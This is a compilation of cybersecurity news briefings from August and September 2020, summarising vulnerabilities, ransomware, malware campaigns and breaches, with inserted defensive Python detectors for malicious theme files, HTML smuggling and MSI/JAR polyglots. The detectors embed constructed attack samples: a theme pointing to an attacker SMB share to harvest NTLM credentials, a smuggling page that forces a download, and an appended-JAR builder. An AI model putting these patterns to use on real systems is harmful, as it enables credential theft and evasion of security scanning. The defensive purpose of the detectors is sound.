Blueliv Intelligence Briefing

Your cybersecurity news summary

Thursday,   September 10th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

BLURtooth vulnerability allows attacking Bluetooth encryption process

A security advisory explains that when Cross-Transport Key Derivation (CTKD) is used to pair dual-mode Bluetooth devices, pairing happens only once, over one of the two transports (BR/EDR or LE), and the Long Term Key / Link Key (LTK/LK) for the other transport is derived from that pairing. In vulnerable implementations the derived keys can overwrite keys already established over the other transport, even where that transport had enforced a higher level of security, which is what a BLUR attack takes advantage of. An attacker within Bluetooth range of a vulnerable device could spoof the identity of a previously paired device to overwrite the original key and gain access to authenticated services. BLURtooth can also be used for man-in-the-middle (MitM) attacks, in which the attacker sits between two vulnerable devices that had been linked using authenticated pairing. Learn more >

New CDRThief malware targets VoIP Linux softswitches to steal metadata

Analysis of the malware revealed that it was specifically created for a particular Linux VoIP platform, namely Linknat VOS2009/3000 softswitches. A softswitch is a software solution acting as a VoIP server that manages traffic (audio/video/text) in a telecommunication network. It is a central element that ensures a connection between both internal and external lines. CDRThief’s purpose is to compromise VOS2009/3000 softswitches and steal call metadata from internal MySQL databases, such as IP addresses of the callers, phone numbers, start time and duration of the call, its route, and type. Learn more >

Threat actors stole $5.4 million from ETERBASE Slovak cryptocurrency exchange

Slovak cryptocurrency exchange ETERBASE disclosed a security breach in which attackers stole Bitcoin, Ether, ALGO, Ripple, Tezos and TRON assets worth about $5.4 million. The company disclosed the hack on Thursday: the threat actors drained various cryptocurrencies from its hot wallets, and all transactions were suspended until September 10. The company has notified law enforcement authorities, who are investigating the incident, and told its users that it has enough capital to meet all its obligations. Learn more >

Zeppelin Ransomware Returns with New Trojan on Board

The Zeppelin ransomware has sailed back into relevance after a hiatus of several months. A wave of attacks spotted in August makes use of a new trojan downloader. Like the initial Zeppelin wave observed in late 2019, these start with phishing emails carrying Microsoft Word attachments (themed as "invoices") with malicious macros on board; once a user enables macros, the infection process starts. The latest campaign has affected around 64 known victims and targets, indicating a degree of targeting. It may have started on June 4, when the command-and-control server the malware uses was registered. Learn more >

Wednesday,   September 9th,   2020

Intel fixes critical vulnerabilities in AMT and ISM platforms

Intel today addressed nine security vulnerabilities with the release of the September 2020 Platform Update, one of them being a critical flaw impacting the Active Management Technology (AMT) and Intel Standard Manageability (ISM) platforms. These issues were detailed in five security advisories published by Intel on its Product Security Center, with fixes addressing them having been delivered to customers via the Intel Platform Update (IPU) process before disclosure. Intel also provides lists of affected products and support for vulnerable products at the end of each advisory, together with contact details for reporting other security issues found to affect Intel products or tech. Learn more >

Microsoft September 2020 Patch Tuesday fixes 129 vulnerabilities

Microsoft has published today its monthly batch of security updates, also known as Patch Tuesday. This month, the OS maker patched 129 vulnerabilities across 15 products, ranging from Windows to ASP.NET. Of note is that this month, of the 129 vulnerabilities, 32 were classified as remote code execution issues, which are bugs that permit attackers to exploit vulnerable applications remotely, over a network. Of these 32, 20 also received a severity classification of "critical," the highest rating on Microsoft's scale, making the 20 vulnerabilities some of the most important bugs patched across Microsoft products this month. Learn more >

Hackers use legitimate cloud monitoring tools to take over Docker, Kubernetes platforms

In a recent attack, the cybercrime group TeamTNT relied on a legitimate tool to avoid deploying malicious code on compromised cloud infrastructure while still retaining control of it. They used an open-source tool built to monitor and control cloud environments running Docker and Kubernetes, reducing their footprint on the breached server. According to researchers, this may be the first time a legitimate third-party tool has been abused to play the part of a backdoor in a cloud environment, and it indicates the evolution of this particular group. Learn more >

Adobe patches critical vulnerabilities of code execution in AEM, FrameMaker and InDesign

Adobe has released security updates to address twelve critical vulnerabilities that could be exploited by attackers to execute arbitrary code on systems running vulnerable versions of Adobe InDesign, Adobe FrameMaker and Adobe Experience Manager. The company also addressed 18 important-severity vulnerabilities in Adobe Experience Manager (AEM) and the AEM Forms add-on package that could lead to arbitrary JavaScript execution in the browser via stored cross-site scripting, or to disclosure of sensitive information via execution with unnecessary privileges. Learn more >

Tuesday,   September 8th,   2020

Chilean bank BancoEstado shuts down after ransomware attack

Chilean bank BancoEstado, one of the country's biggest banks, was hit by a ransomware attack that has forced its branches to remain closed since September 7. The ransomware encrypted most of the company's servers and workstations. The attack took place over the weekend; the bank disclosed it on Sunday via its Twitter account and decided to keep branches closed while it investigates the incident and recovers its systems. Learn more >

Windows credentials can be stolen through Windows 10 themes

This weekend a security researcher revealed that specially crafted Windows themes can be used to harvest Windows credentials, an attack the report frames as Pass-the-Hash. A .theme file can point a resource such as the wallpaper at a remote SMB share that requires authentication; when the theme is applied, Windows automatically tries to log in to the remote system by sending the user's login name and an NTLM authentication response (NetNTLMv2) derived from their password hash. The attacker harvests these credentials and then attempts to crack the captured hash offline to recover the password, giving them the victim's login name and password. Learn more >
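A quick check a defender can run over .theme files before allowing them onto endpoints, as an added example that is not part of the briefing or the researcher's work: the file is an INI-style document, so a parser can flag any entry whose value is a UNC path or URL, which is exactly what forces the outbound authentication. The sample theme below is constructed for the example and the address in it is a documentation address, not a real indicator.

```python
import configparser
import re

# Constructed sample of a malicious .theme file (made up for this example, not a
# sample from the report): the wallpaper points at an attacker-controlled SMB
# share, so Windows would try to authenticate to that host when the theme is applied.
SAMPLE_THEME = r"""[Theme]
DisplayName=Aero Dark

[Control Panel\Desktop]
Wallpaper=\\203.0.113.10\share\wallpaper.jpg
TileWallpaper=0

[Slideshow]
ImagesRootPath=%SystemRoot%\Web\Wallpaper
"""

# A resource value is remote if it is a UNC path (\\host\share\...) or a URL.
REMOTE_RESOURCE = re.compile(r"^(\\\\[^\\]+\\|(?:https?|ftp)://)", re.IGNORECASE)


def find_remote_resources(theme_text):
    """Return (section, key, value) for every entry whose value resolves to a
    remote location. Such an entry makes Windows fetch the resource and, for an
    SMB share, send the user's NTLM credentials to that host."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep key case as written in the file
    cp.read_string(theme_text)
    hits = []
    for section in cp.sections():
        for key, value in cp.items(section):
            value = value.strip()
            if REMOTE_RESOURCE.match(value):
                hits.append((section, key, value))
    return hits


def is_safe_theme(theme_text):
    """True when no entry points outside the local machine."""
    return not find_remote_resources(theme_text)
```

The check only covers the file contents; the network-level mitigations are blocking outbound TCP 445 at the perimeter and setting the Group Policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to deny, so a leaked theme cannot complete the authentication even if it slips through.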

Argentinian government hit by Netwalker ransomware

Argentina’s official immigration agency, Dirección Nacional de Migraciones, was hit by a Netwalker ransomware attack that interrupted border crossings into and out of the country for four hours. According to local media, the ransomware operators also exfiltrated sensitive data from the agency. The agency started receiving numerous tech support calls from checkpoints at approximately 7 AM on August 27th. Learn more >

Data breach of Webmaster Forum Digital Point exposes over 800k users

On July 1, researchers uncovered an unsecured Elasticsearch database containing over 62 million records. In total, data belonging to 863,412 Digital Point users was included in the leak. According to the team, names, email addresses, and internal user ID numbers were made publicly available. In addition, internal records and user post details were stored in the open database. While examining the database to find out who the owner was, the researchers stumbled across sets of data relating to forum members who flagged posts and the reasons behind these reports -- including allegations of "bad business dealings," spam, and other reasons, some described as appearing to be "petty and personal." Learn more >

Monday,   September 7th,   2020

Malware gang uses .NET library to generate Excel docs that bypass security checks

A newly discovered malware gang is using a clever trick to create malicious Excel files that have low detection rates and a higher chance of evading security systems. The gang, named Epic Manchego, has been active since June, targeting companies all over the world with phishing emails that carry a malicious Excel document. These are not standard Excel spreadsheets: the malicious files appear to be generated with the EPPlus .NET library in the Office Open XML (OOXML) format. Files built this way carry the VBA macro source but lack the compiled VBA code that some antivirus and email scanners look for when searching for signs of malware, which is why they pass those scanners with low detection rates. Learn more >

Visa alert: Baka credit card JavaScript skimmer

Baka is a sophisticated e-skimmer developed by a skilled malware developer; it implements a unique obfuscation method and loader. The Baka loader works by dynamically adding a script tag to the current page that loads a remote JavaScript file. The JavaScript URL is hardcoded in the loader script in encrypted form, and experts observed that the attackers can change the URL for each victim. The e-skimmer payload decrypts to JavaScript written to resemble code that would be used to render pages dynamically. The final payload and the loader use the same encryption method; once executed, the skimmer steals payment card data from the checkout form. Learn more >

New strain of Thanos ransomware fails in its attempt to overwrite the Windows MBR

"Overwriting the MBR is a more destructive approach to ransomware than usual," researchers said. "Victims would have to expend more effort to recover their files – even if they paid the ransom; fortunately, in this case, the code responsible for overwriting the MBR caused an exception because the ransom message contained invalid characters, which left the MBR intact and allowed the system to boot correctly." Even though they failed to overwrite the compromised computers' MBRs, the Thanos operators still dropped their ransom note the regular way, by creating HOW_TO_DECIPHER_FILES.txt text files asking the victims to pay $20,000 to recover their data. The researchers think the attackers gained access to the targets' networks before the ransomware payloads were deployed, since valid credentials were found within the samples recovered after the attack. Learn more >

Phishing adds overlay screens on legitimate sites to steal credentials

A phishing campaign recently deployed against various businesses uses the company's own home page to disguise the attack and trick potential victims into providing login credentials. This is a new tactic, researchers say: the page loads the legitimate site of the business and applies a fake login box on top of it. The attack starts with an email purporting to be from the company's technical support team, informing the recipient that some messages were blocked from reaching the inbox because they were quarantined. To create a sense of urgency, the attacker's message states that the emails are scheduled for deletion unless the recipient reviews them and takes action to recover them. Learn more >

Thursday,   August 27th,   2020

New Zealand Stock Exchange: third day with its operations canceled after DDoS attack

As a result, the exchange has suspended all operations until the attacks end or the connectivity problems can be mitigated. The group uses names like Armada Collective and Fancy Bear, both borrowed from more famous hacker groups, to email companies and threaten DDoS attacks that can cripple operations and inflict long downtime and large financial costs on the targets unless the victims pay a large ransom in Bitcoin. Learn more >

Microsoft Azure Sphere vulnerabilities fixed

The first of the two issues resides in the Normal World application READ_IMPLIES_EXEC personality and can be exploited through specially crafted shellcode that causes a process's heap to become executable. The vulnerability affects version 20.07 of Azure Sphere. The second issue was found in /proc/thread-self/mem and can be exploited via specially crafted shellcode designed to write to a process's non-writable memory. An attacker could supply shellcode specifically designed to modify the program and trigger the vulnerability. Learn more >

North Korean threat actors BeagleBoyz target banks worldwide

The campaign, dubbed "FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks," is an international operation designed to initiate fraudulent international money orders and ATM cash-outs. In the operation, North Korean operatives seek to gain unauthorized access to networks, point-of-sale systems, and ATMs belonging to their victims. According to the advisory, the BeagleBoyz have attempted to steal at least $2 billion since 2015 and have frequently left banking systems damaged or inoperative in their wake. Learn more >

Twitter pro-Chinese propaganda botnet quotes Bram Stoker’s Dracula

A research group said today it identified a Twitter botnet of around 3,000 bots that pushed pro-Chinese political spam, echoing official messaging released through state propaganda accounts. They were able to identify the botnet thanks to a quirk shared by the vast majority of the bot accounts: most used quotes from Bram Stoker's Dracula for the profile description and the first two tweets. The Dracula botnet, as they named this cluster of fake accounts, exhibited multiple similarities to past Twitter botnets that were part of Spamouflage. Learn more >

Monday,   August 24th,   2020

Vulnerability in ATM vendors Diebold and NCR fixed

The flaws could have allowed crooks to modify the amount of money deposited to their card (so-called deposit forgery) and then make fraudulent cash withdrawals against the inflated balance. Once the balance was modified, the criminals would quickly attempt cash withdrawals before the bank detected the anomalous increase in the account balance. The two bugs, tracked as CVE-2020-9062 and CVE-2020-10124, affect respectively Diebold Nixdorf ProCash 2100xe USB ATMs running Wincor Probase software and NCR SelfServ ATMs running APTRA XFS software. Learn more >

Google Drive vulnerability could allow malware installation

The issue resides in Google Drive's “manage versions” feature, which lets users upload and manage different versions of a file, and in the interface that presents the new version of a file to users. The feature was designed to let users replace an older version of a file only with a new one having the same file extension; unfortunately, that restriction is not enforced. The researchers discovered that the functionality allows users to upload a new version with any file extension for any file stored on Google Drive, allowing the upload of malicious executables. Learn more >

Unskilled Iranian hackers deploy Dharma ransomware

Low-skilled hackers, likely from Iran, have joined the ransomware business, targeting companies in Russia, India, China and Japan. They go after easy hits, using publicly available tools in their activity, and deploy Dharma ransomware. Based on forensic artifacts, this is an unsophisticated, financially motivated gang that is new to cybercrime. Their demand is between 1 and 5 Bitcoin (currently $11,700 to $59,000), which is at the lower end of ransom demands compared to other ransomware operations. Learn more >

Phishing campaign delivering the Grandoreiro banking trojan impersonates Spain’s Agencia Tributaria

The campaign began on August 11th, 2020, when many Spanish users received messages claiming to be from the Agencia Tributaria. The emails attempted to trick users into believing they were a communication from the tax agency: the messages used sender info like “Servicio de Administración Tributaria” and came from the email address contato@acessofinanceiro[.]com. The message includes a link that points to a ZIP archive that claims to contain a digital tax receipt, and informs the users that they have to fill in a document to be submitted to the Agencia Tributaria along with a fee to pay. Learn more >

Friday,   August 21st,   2020

Gmail flaw allowing email spoofing fixed

This issue was caused by "missing verification when configuring mail routes" as detailed by researchers. To exploit this flaw to send authenticated spoofed emails that could pass both SPF and DMARC, attackers would have to abuse a broken recipient issue in Google's mail validation rules and use an inbound email gateway to resend the message from Google's backend so that downstream mail servers would automatically trust it. Learn more >

Jenkins critical vulnerability causing data exposure fixed

This flaw has a CVSS rating of 9.4 and affects Eclipse Jetty versions 9.4.27.v20200227 to 9.4.29.v20200521; Jetty is a full-featured Java HTTP server and servlet container that Jenkins embeds and that is used in other software frameworks. The vulnerability might enable unauthenticated threat actors to obtain HTTP response headers that may carry sensitive data intended for another user. Learn more >

IBM-reported vulnerability affecting IoT devices patched

On Wednesday, IBM revealed the vulnerability, CVE-2020-15858, which it found last September in Thales' Cinterion EHS8 M2M modules. The flaw is also in related products, including the BGS5, EHS5/6/8, PDS5/6/8, ELS61, ELS81 and PLS62 modules. "This vulnerability could enable attackers to compromise millions of devices and access the networks or VPNs supporting those devices by pivoting onto the provider's backend network," researchers write. "In turn, intellectual property, credentials, passwords and encryption keys could all be readily available to an attacker". Learn more >

Maldoc malware campaign delivering the QakBot/QBot banking trojan through zipping Word documents

This particular campaign features a ZIP file; within the ZIP attachment is a Word document that contains macros. These macros execute a PowerShell script that then downloads the Qakbot payload from specific URLs. The campaign also includes two new techniques: a bypass of content disarm and reconstruction (CDR) technology by zipping the Word document, and a bypass of parent/child process pattern detection because the Visual Basic code is executed via Explorer. Learn more >

Thursday,   August 20th,   2020

North Korean BLINDINGCAN RAT malware discovered

"CISA received four Microsoft Word Open Extensible Markup Language (XML) documents (.docx), two Dynamic-Link Libraries (DLLs)," the alert reads. "The .docx files attempt to connect to external domains for a download. A 32-bit and a 64-bit DLL was submitted that install a 32-bit and a 64-bit DLL named 'iconcache.db' respectively. The DLL 'iconcache.db' unpacks and executes a variant of Hidden Cobra RAT". Based on CISA and FBI malware analysis results, the BLINDINGCAN malware can also remove itself from compromised systems and clean its traces to avoid detection, among other capabilities. Learn more >

Windows remote access vulnerabilities fixed

For the vulnerabilities to be exploited, attackers would first need code execution on the victim's device in order to run a specially crafted application. KB4578013 addresses the vulnerabilities by correcting how Windows Remote Access handles memory and file operations. Customers running Windows 8.1 or Server 2012 R2 should install the update as soon as possible to be protected from attacks that could exploit these vulnerabilities. Learn more >

Experian South Africa data breach impacting 24M customers

While Experian did not disclose the number of impacted users, a report from the South African Banking Risk Information Centre (SABRIC), an anti-fraud and banking non-profit, claimed the breach impacted 24 million South Africans and 793,749 local businesses. Experian said it reported the incident to local authorities, who were able to track down the individual behind the incident. Since then, Experian said it obtained a court order "which resulted in the individual's hardware being impounded and the misappropriated data being secured and deleted." Experian said that none of the data was used for fraudulent purposes before being deleted and that the fraudster did not compromise its infrastructure, systems, or customer database. Learn more >

Linux systems are targeted by Lucifer cryptomining DDoS malware

When it was first spotted in May, the malware was deploying an XMRig miner on Windows computers infected using weaponized exploits for high- and critical-severity vulnerabilities, or by brute-forcing machines with TCP ports 135 (RPC) and 1433 (MSSQL) open. The new Linux version comes with capabilities similar to its Windows counterpart, including modules for cryptojacking and for launching TCP, UDP and ICMP flooding attacks. Additionally, Lucifer-infected Linux devices can be used in HTTP-based DDoS attacks (including HTTP GET and POST floods, and HTTP ‘CC’ DDoS attacks). Learn more >

Wednesday,   August 19th,   2020

Small Business Owners in the US Hit with Phishing Campaign Impersonating SBA Officials

The Cybersecurity and Infrastructure Security Agency (CISA) is currently tracking an unknown malicious actor who is spoofing the Small Business Administration (SBA) COVID-19 loan relief webpage via phishing emails. These emails include a malicious link to the spoofed SBA website that the cyber actor is using for malicious re-directs and credential stealing. Learn more >

FritzFrog P2P botnet malware attacks SSH servers worldwide to mine Monero

The attack has already infiltrated over 500 servers in the U.S. and Europe, including those of universities and a railway company. The advanced nature of FritzFrog lies in its proprietary, fileless P2P implementation written from scratch: the malware assembles and executes its payload entirely in memory, so it is volatile. Moreover, its custom P2P implementation means there is no single command and control (C&C) server sending instructions to FritzFrog; it is decentralized and self-sufficient. Despite the aggressive brute-force tactics FritzFrog employs to breach SSH servers, it is strangely efficient, distributing its attempts evenly across a target network. Learn more >

Microsoft is removing insecure Cloud App Security cipher suites

Microsoft today announced that some insecure cipher suites currently supported by Microsoft Cloud App Security (MCAS) will be removed later this year. After that happens, Redmond will no longer provide support for connections using these non-secure cipher suites and they will no longer work as expected. To prepare for this incoming change, "[c]ustomers should ensure that all client-server and browser-server combinations are using supported suites in order to maintain the connection to Microsoft Cloud App Security". Learn more >

New Attack Alert: Duri

Duri leverages HTML smuggling to deliver malicious files to users’ endpoints while evading network security solutions such as sandboxes and legacy proxies: the payload is assembled inside the browser by JavaScript rather than fetched as a file over the network, so nothing those controls can inspect crosses the wire. The researchers note that browser isolation prevents this attack from reaching the endpoint. According to their observations, the Duri campaign started at the beginning of July and is currently active. Learn more >
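Because the file only exists once the browser has decoded it, the place to catch HTML smuggling is the HTML itself. The following is an added example, not code from the briefing or from the researchers who reported Duri: a scorer that looks for the client-side file-assembly pattern (base64 literal, Blob construction, object URL, forced download) and decodes embedded base64 literals far enough to see whether they start with a ZIP or PE header. The sample page is constructed for the example and is not the real Duri page.

```python
import base64
import re

# Constructed page modelled on the HTML-smuggling pattern (not the actual Duri
# page): the payload travels as a base64 string inside the HTML, is decoded by
# JavaScript into a Blob, and is handed to the user as a download, so no file
# ever crosses the network for a proxy or sandbox to inspect.
SAMPLE_HTML = """<html><body>
<script>
var b64 = "UEsDBBQAAAAIAAAAAAAAAAAA";
var bin = atob(b64);
var arr = new Uint8Array(bin.length);
for (var i = 0; i < bin.length; i++) arr[i] = bin.charCodeAt(i);
var blob = new Blob([arr], {type: 'application/octet-stream'});
var a = document.createElement('a');
a.href = URL.createObjectURL(blob);
a.download = 'invoice.zip';
document.body.appendChild(a); a.click();
</script></body></html>"""

# Constructed benign page: a plain download link, fetched over the network.
BENIGN_HTML = "<html><body><a href='/report.pdf' download>Quarterly report</a></body></html>"

INDICATORS = {
    "base64_decode": re.compile(r"\batob\s*\("),
    "blob_construction": re.compile(r"new\s+Blob\s*\("),
    "object_url": re.compile(r"createObjectURL\s*\("),
    "legacy_ie_save": re.compile(r"msSaveOrOpenBlob|msSaveBlob"),
    "forced_download": re.compile(r"\.download\s*="),
}
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")


def score_html_smuggling(html):
    """Return (sorted indicator names found, first 4 bytes of each decodable
    base64 literal). The magic bytes tell you what is being smuggled."""
    matched = sorted(name for name, rx in INDICATORS.items() if rx.search(html))
    heads = []
    for m in B64_LITERAL.finditer(html):
        try:
            heads.append(base64.b64decode(m.group(1), validate=True)[:4])
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return matched, heads


def is_suspicious(html):
    """Flag when a file is built client-side and pushed as a download, or when
    an embedded blob starts with a ZIP (PK..) or PE (MZ) header."""
    matched, heads = score_html_smuggling(html)
    builds_file = "blob_construction" in matched or "legacy_ie_save" in matched
    embeds_binary = any(h.startswith(b"PK\x03\x04") or h.startswith(b"MZ") for h in heads)
    return (builds_file and "forced_download" in matched) or embeds_binary
```

Run it from a mail gateway or proxy hook over HTML attachments and responses; real campaigns obfuscate the JavaScript, so treat a match as a signal to detonate or isolate rather than as the only control.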

Tuesday,   August 18th,   2020

Notepad++ text editor banned in China

"I reject the idea that our given free speech rights are restrained by an authoritarian country. Notepad++ stands with the people of Hong Kong," the Stand with Hong Kong blog post stated. When trying to download the Notepad++ program using China-based web browsers, downloaders are greeted with interstitial messages saying the site has been blocked. "I am not surprised about their reaction. But since the free speech is basic right of everyone, I won't keep silent," creator of the software said. Learn more >

Cryptomining bot TeamTNT steals AWS credentials

The group would access the API and deploy servers inside the Docker install that would run DDoS and crypto-mining malware. According to researchers, the TeamTNT botnet is now targeting also misconfigured Kubernetes installations. The botnet operators have added a new feature that scans the underlying infected servers for any Amazon Web Services (AWS) credentials. The TeamTNT bot borrows the code from another worm tracked as Kinsing, which was spotted in April while targeting Docker clusters to deploy crypto-miners. Learn more >

Microsoft fixes Zero Day flaw reported 2 years ago

This vulnerability is tracked as CVE-2020-1464 and is described by Microsoft as a spoofing vulnerability in how Windows validates file signatures. Security researchers later noted in a blog post that this update is for a bug reported two years earlier, on August 18th, 2018, which Microsoft had originally stated it would not fix. With the patch for CVE-2020-1464, Windows no longer considers MSI files to be validly signed if they have been tampered with by appending a JAR file. Learn more >
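Regardless of what the Authenticode check says, an MSI with a ZIP archive glued to its end is not something a vendor ships. The check below is an added example, not code from the briefing or from the researchers: a genuine MSI is an OLE compound file and never parses as a ZIP, but Python's zipfile locates the end-of-central-directory record from the tail of the file, so if it finds one the installer has trailing data, and a manifest inside it marks the trailing data as a JAR. The sample "installer" is a constructed stand-in (a bare compound-file header), not a real signed MSI, and no signature verification is performed here.

```python
import io
import zipfile

# Compound File Binary (OLE) header magic shared by every .msi.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"


def build_sample(append_jar):
    """Constructed stand-in for a signed MSI (not a real installer): a minimal
    compound-file header padded to one 512-byte sector, with a tiny JAR (a ZIP
    with a manifest) optionally glued on the end, as in the attack."""
    msi = OLE_MAGIC + b"\x00" * 504
    if not append_jar:
        return msi
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\nMain-Class: Dropper\n")
        zf.writestr("Dropper.class", b"\xca\xfe\xba\xbe")  # class-file magic only
    return msi + buf.getvalue()


def check_msi(data):
    """Return a list of findings for an MSI image. zipfile reads the archive from
    the end of the file and tolerates data in front of it, so any valid ZIP seen
    here sits after the signed compound-file structure: the CVE-2020-1464 shape."""
    findings = []
    if not data.startswith(OLE_MAGIC):
        findings.append("not a compound file (not an MSI at all)")
        return findings
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
        findings.append("trailing ZIP archive appended: " + ", ".join(names))
        if "META-INF/MANIFEST.MF" in names:
            findings.append("appended archive is a JAR (has META-INF/MANIFEST.MF)")
    return findings
```

The same polyglot logic generalises: any signed container format whose signature covers a fixed structure rather than the whole file can have a second format appended, and the appended format's own parser (here, Java reading the JAR from the end) is what executes.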

Cruise line operator Carnival in danger after ransomware attack

As part of the attack, Carnival states data was likely stolen and could lead to claims from those affected by the potential data breach: "Nonetheless, we expect that the security event included unauthorized access to personal data of guests and employees, which may result in potential claims from guests, employees, shareholders, or regulatory agencies,". The filing does not indicate the ransomware operation that compromised their network, and there are close to twenty different gangs that steal and leak unencrypted files as part of their attacks. Learn more >

Monday,   August 17th,   2020

Canadian govt accounts hijacked to steal COVID-19 funds

A statement from the Treasury Board of Canada Secretariat on Saturday revealed that the attackers had used tried-and-tested credential stuffing techniques to hijack GCKey and Canada Revenue Agency (CRA) accounts. The government said that 9,041 users were affected by the campaign and that in a third of cases services were accessed illegally. Around 5,500 CRA accounts were targeted by this and a separate credential stuffing attack on the tax office, it added. Affected GCKey accounts were cancelled as soon as the threat was discovered, and departments are contacting users whose credentials were revoked to provide instructions on how to receive a new GCKey. Learn more >

SANS shares the Indicators of Compromise for phishing attack that led to data breach

Some of the forwarded emails contained a total of approximately 28,000 records of personal information (PII) for SANS members. When disclosing the attack, SANS stated that they would release information that they discover about the attack to benefit the cybersecurity community. Yesterday, SANS released the indicators of compromise (IOCs) for their phishing attack so that other organizations can make sure they were not affected. Learn more >

Technology giant Konica Minolta hit by RansomEXX ransomware attack

After some customers stated that their Konica contacts had indicated a breach caused the outage, a source shared with researchers a copy of the ransom note used in the attack on Konica Minolta, named '!!KONICA_MINOLTA_README!!.txt'. It was also discovered that devices in the company were encrypted, with the '.K0N1M1N0' extension appended to files. This ransom note belongs to a relatively new ransomware called RansomEXX, which is human-operated: threat actors compromise a network and, over time, spread to other devices until they obtain administrator credentials. Learn more >

PurpleWave – A New Infostealer from Russia

A new infostealer malware called PurpleWave was found being advertised and sold on Russian cyber-crime forums for $68 US. An infostealer is a type of malware that gathers information from the infected system and is able to install more malware once inside it. PurpleWave is capable of stealing cookies, passwords and credit cards. It can also steal files, take screenshots and install additional malware. Learn more >

Blueliv Intelligence Briefing

Thursday, August 13th, 2020

Vulnerability in 4G Voice over LTE (VoLTE) protocol used to eavesdrop on voice calls

For each call, mobile operators must select an encryption key (called a stream cipher) to secure the call. Normally, the stream cipher should be unique for each call. However, a team of academics from the Ruhr University in Bochum, Germany, has discovered that not all mobile operators follow the 4G standard to the letter. Researchers say that while mobile operators do, indeed, support encrypted voice calls, many calls are encrypted with the same encryption key. In their research, academics said that the problem usually manifests at the base station (mobile cell tower) level, which, in most cases, reuses the same stream cipher or uses predictable algorithms to generate the encryption key for voice calls. Learn more >
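The item above reports that some base stations reuse the same keystream for more than one call. The following Python block is an added illustration of why a per-call unique key matters; it is not code from the Bochum researchers and uses a constructed toy keystream generator (SHA-256 in counter mode) and constructed "voice frame" payloads rather than any real LTE cipher. It shows that when two calls share one keystream, the XOR of the two ciphertexts cancels the keystream entirely, so anyone who knows (or can reconstruct) the content of one call recovers the other, whereas with distinct per-call keys the same computation yields nothing useful.

```python
import hashlib


def keystream(key: bytes, length: int) -> bytes:
    """Toy keystream generator, constructed for illustration only.

    Derives pseudo-random bytes from `key` with SHA-256 in counter mode.
    This stands in for the per-call stream cipher; it is NOT a real
    cellular cipher and must never be used to protect anything.
    """
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:length])


def xor(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR, truncated to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt_call(call_key: bytes, frames: bytes) -> bytes:
    """Stream-cipher encryption: plaintext XOR keystream."""
    return xor(frames, keystream(call_key, len(frames)))


def recover_from_reuse(ct_known: bytes, ct_target: bytes, pt_known: bytes) -> bytes:
    """If both ciphertexts used the same keystream K:
       ct_known XOR ct_target = (pt_known XOR K) XOR (pt_target XOR K)
                              = pt_known XOR pt_target
    so XOR-ing in the known plaintext leaves pt_target. With distinct
    keystreams the result is pt_target XOR K1 XOR K2, which is useless.
    """
    return xor(xor(ct_known, ct_target), pt_known)


def simulate(base_station_reuses_key: bool) -> dict:
    """Encrypt two calls and report whether keystream reuse exposes call 2.

    `base_station_reuses_key=True` models the misbehaviour described in
    the article; False models a standard-conforming per-call key.
    """
    # Constructed sample payloads; equal length so the comparison is exact.
    call1_frames = b"call one audio frame payload 0001"
    call2_frames = b"call two audio frame payload 0002"

    # Constructed keys (fixed bytes so the simulation is deterministic).
    key_call1 = b"\x01" * 32
    key_call2 = key_call1 if base_station_reuses_key else b"\x02" * 32

    ct1 = encrypt_call(key_call1, call1_frames)
    ct2 = encrypt_call(key_call2, call2_frames)

    # The party checking exposure knows call 1's content (e.g. their own
    # call) and observes both ciphertexts.
    recovered = recover_from_reuse(ct1, ct2, call1_frames)
    return {
        "keystream_reused": base_station_reuses_key,
        "recovered_call2": recovered,
        "call2_exposed": recovered == call2_frames,
    }


if __name__ == "__main__":
    for reuse in (True, False):
        r = simulate(reuse)
        print(f"keystream reused={r['keystream_reused']}: "
              f"call 2 exposed={r['call2_exposed']}")
```

The audit value of this for an operator is the last field: any key-derivation path that can hand two calls the same keystream fails this check, independent of how strong the underlying cipher is.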

Coronavirus ventilator manufacturer Boyce Technologies targeted by ransomware

The cybercriminals have threatened that more information will be disclosed next week through the site if an undisclosed crypto ransom is not paid by the firm. Boyce Technologies is well-known for its work in designing and manufacturing FDA-approved low-cost ventilators in just 30 days during the first months of the COVID-19 pandemic, amid the big demand for the machines across New York hospitals. Prior to the attack, the company was making 300 units a day with the help of the robots built by the company. Learn more >

Alexa voice assistant, exploitable to hand over user data

Users are able to extend Alexa’s capabilities by installing “skills”, additional functionality developed by third-party vendors which can be thought of as apps, such as weather programs and audio features. The smart assistant, which is found in devices such as the Amazon Echo and Echo Dot, with over 200 million shipments worldwide, was found to be vulnerable to attackers seeking user personally identifiable information (PII) and voice recordings, because its subdomains were susceptible to Cross-Origin Resource Sharing (CORS) misconfiguration and cross-site scripting (XSS) attacks. Learn more >

Color by numbers: inside a Dharma ransomware-as-a-service attack

The actors using this particular RaaS are equipped with a package of pre-built scripts, internal Windows tools, legitimate third-party “freeware” software, well-known security tools and publicly-available exploits, integrated together through bespoke PowerShell, batch, and AutoIT scripts. This pre-packaged toolkit, combined with back-end technical support, significantly extends the reach of the Dharma RaaS operators, allowing them to profit while their affiliates do the hands-on-keyboard work of breaching networks, dropping ransomware, and managing “customer service” with the victims. Learn more >

Blueliv Intelligence Briefing

Wednesday, August 12th, 2020

Customer data breached at Michigan State online store

Hackers have breached Michigan State University’s online store, gaining access to customer credit card numbers and other personal information, the university said. The university on Monday began notifying customers who may have been affected by the hack. Michigan State’s information security team has corrected the site’s vulnerabilities that allowed the intrusion between Oct. 19, 2019 and June 26, officials said. Learn more >

Google Chrome bug would let hackers bypass CSP protection

